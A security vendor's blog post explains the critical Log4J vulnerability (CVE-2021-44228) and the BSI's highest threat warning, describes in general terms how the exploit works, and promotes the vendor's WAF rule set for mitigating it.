Select Page
Back to overview

Reading Time: .

BSI red alert: Security experts, developers, and admins around the globe are working hard to close the critical Log4J vulnerability in their systems. The flaw (CVE-2021-44228) allows cybercriminals to inject malicious code on web servers and connected systems without being detected. The potential consequences range from data loss and blackmail attempts to internet service outages and the compromise of entire corporate networks.
The affected companies and their customers are in a race against time. While massive efforts are being made everywhere to rectify the problem as quickly as possible, cybercriminals are stepping up their attacks on vulnerable systems by successively scanning the internet for unprotected web servers.

How the Log4J exploit works

To exploit the vulnerability in the Java library, attackers send text snippets containing special strings of code in the form of usernames or messages to a web application that uses Log4J for logging. The command injected through this process causes the application to load additional malicious code from servers controlled by the attackers. This can be any sort of malicious code, including viruses, Trojans, or even worms. Using the Log4J vulnerability, attackers can thus also take control of the entire system and control it remotely.

There are already initial indications of successful compromises with cryptominers siphoning off computing power from infected systems for mining cryptocurrencies such as Bitcoin. The vulnerability is also reportedly already being actively exploited by botnets. For a successful attack, attackers don’t even need to load malicious code. The German Federal Office for Information Security (BSI) warns that individual requests are sufficient for disclosing sensitive data such as API keys.

Highest threat level

The BSI has issued the highest warning level (4/Red) for the Log4J vulnerability. Since the Java logging library is widely used, a vast number of solutions and systems from all sectors and company sizes are at risk from the flaw. A list of security warnings for products from over 450 manufacturers (as of December 15) is being maintained on the GitHub code platform, and this figure is rising. According to the BSI, the extent of the threat situation cannot yet be conclusively determined. It is, however, apt to compare this with the Heartbleed Bug, a critical error in OpenSSL, which endangered the encrypted communication of hundreds of thousands of web servers and services in 2014.

Log4J mitigation with the Myra Hyperscale WAF

To mitigate Log4J-based attacks, Myra Security offers a specially developed rule set for its Hyperscale WAF. Deploying the new rules helps companies transparently detect Log4J exploits on their systems and block access to vulnerable servers. As a result, affected companies gain valuable time to patch affected systems and scrub compromised web servers.

Myra thus offers fast and efficient assistance in the current exceptional situation. You are welcome to contact us with any questions you may have concerning Log4J mitigation.

Share this article

//php get_sidebar(); ?>